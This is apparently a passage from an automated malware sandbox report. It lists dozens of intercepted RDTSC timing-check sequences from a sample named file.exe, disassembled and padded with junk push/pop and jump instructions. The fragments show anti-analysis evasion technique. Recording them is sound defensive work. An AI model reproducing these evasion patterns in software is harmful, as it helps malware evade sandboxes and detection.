                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115E5F4 second address: 115E601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1165DE8 second address: 1165DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166426 second address: 116644A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 pushad 0x00000008 jng 00007F2E050A57C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11666D9 second address: 11666F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2608h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11666F7 second address: 116671D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2E050A57CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F2E050A57CAh 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F2E050A57CAh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166A23 second address: 1166A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2E044F25F6h 0x0000000a popad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F2E044F2605h 0x00000013 pop edi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b jmp 00007F2E044F2609h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166A67 second address: 1166A6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166A6D second address: 1166A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166A73 second address: 1166A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166A79 second address: 1166A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116708D second address: 11670A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F2E050A57C6h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop edi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11675AD second address: 11675B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C2CD second address: 116C2F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57D8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F2E050A57CAh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116F5DC second address: 116F5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116F85B second address: 116F895 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2E050A57EFh 0x00000008 jmp 00007F2E050A57D2h 0x0000000d jmp 00007F2E050A57D7h 0x00000012 pushad 0x00000013 jng 00007F2E050A57C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116F895 second address: 116F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FA22 second address: 116FA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2E050A57C6h 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FA2D second address: 116FA33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FA33 second address: 116FA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2E050A57C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FBC7 second address: 116FBCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FBCB second address: 116FBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FBDD second address: 116FBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E044F2601h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176007 second address: 117600D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117600D second address: 117602F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2E044F2604h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007F2E044F25F6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176185 second address: 11761A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2E050A57D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11761A4 second address: 11761BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2607h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176464 second address: 1176474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F2E050A57C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176474 second address: 11764C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2604h 0x00000007 jg 00007F2E044F25F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2E044F25FAh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F2E044F260Fh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11764C1 second address: 11764D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CFh 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11764D9 second address: 11764DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11764DF second address: 11764E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117662A second address: 1176634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176634 second address: 117663A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176BC7 second address: 1176BDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E8F second address: 1176E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176E93 second address: 1176EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F25FAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176EA3 second address: 1176EBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 jnp 00007F2E050A57C6h 0x0000000f jnc 00007F2E050A57C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CCEA second address: 117CCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2E044F25F6h 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117CCF5 second address: 117CD08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push edx 0x0000000b jnp 00007F2E050A57C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11805C6 second address: 11805DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E044F25F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F2E044F25F6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11805DC second address: 11805E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAF44 second address: 10BAF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180896 second address: 11808A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F2E050A57C8h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11808A6 second address: 11808AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11808AC second address: 11808D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2E050A57C6h 0x0000000a popad 0x0000000b jmp 00007F2E050A57CEh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jg 00007F2E050A57C6h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11808D2 second address: 11808D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11808D6 second address: 11808DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11822B5 second address: 11822D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2E044F25F8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F2E044F2604h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187D95 second address: 1187D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F3F6 second address: 118F40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2603h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118F40D second address: 118F41D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F2E050A57C6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11955D9 second address: 11955DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195706 second address: 1195710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195710 second address: 1195715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119E12D second address: 119E141 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2E050A57C6h 0x00000008 jp 00007F2E050A57C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1001 second address: 11A1005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1005 second address: 11A1040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CFh 0x00000007 jmp 00007F2E050A57D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F2E050A57CDh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1040 second address: 11A1050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A563D second address: 11A5643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5643 second address: 11A564E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2E044F25F6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A564E second address: 11A5663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5663 second address: 11A5673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1325 second address: 11B1329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1329 second address: 11B1343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2606h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1343 second address: 11B1361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F2E050A57C6h 0x0000000a jmp 00007F2E050A57D4h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1361 second address: 11B1365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1365 second address: 11B1381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F2E050A57C6h 0x0000000e jmp 00007F2E050A57CEh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AFC1B second address: 11AFC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AFC1F second address: 11AFC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2E050A57D7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AFC41 second address: 11AFC47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AFEDB second address: 11AFEFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2E050A57C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2E050A57D3h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AFEFE second address: 11AFF04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0093 second address: 11B0097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0097 second address: 11B009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B009B second address: 11B00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B04B8 second address: 11B04BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B40A4 second address: 11B40CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F2E050A57CAh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F2E050A57CEh 0x00000017 pushad 0x00000018 popad 0x00000019 ja 00007F2E050A57C6h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B40CB second address: 11B40E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F2602h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B40E2 second address: 11B40E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B40E7 second address: 11B40ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1235 second address: 11D1240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2E050A57C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1240 second address: 11D1246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1246 second address: 11D125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F2E050A57C8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F2E050A57C6h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D125F second address: 11D1273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2E044F25FEh 0x0000000c push edx 0x0000000d pop edx 0x0000000e jng 00007F2E044F25F6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1273 second address: 11D1278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1278 second address: 11D12AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F2602h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007F2E044F2606h 0x00000010 popad 0x00000011 js 00007F2E044F2602h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D10C7 second address: 11D10D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3E29 second address: 11D3E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3E2D second address: 11D3E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3E33 second address: 11D3E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F2E044F25FCh 0x0000000c jg 00007F2E044F25F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3E49 second address: 11D3E5E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2E050A57C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F2E050A57C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D39BA second address: 11D39F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2605h 0x00000007 jnl 00007F2E044F25F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2E044F2601h 0x00000016 jmp 00007F2E044F25FAh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D39F6 second address: 11D3A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2E050A57C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3B5C second address: 11D3B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F2E044F25FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3B69 second address: 11D3B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3B6D second address: 11D3BB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2E044F2607h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F2E044F25F8h 0x00000012 push edi 0x00000013 pop edi 0x00000014 je 00007F2E044F25FEh 0x0000001a jnp 00007F2E044F25FEh 0x00000020 jg 00007F2E044F25F6h 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a js 00007F2E044F25F6h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E9AE1 second address: 11E9AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E050A57D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
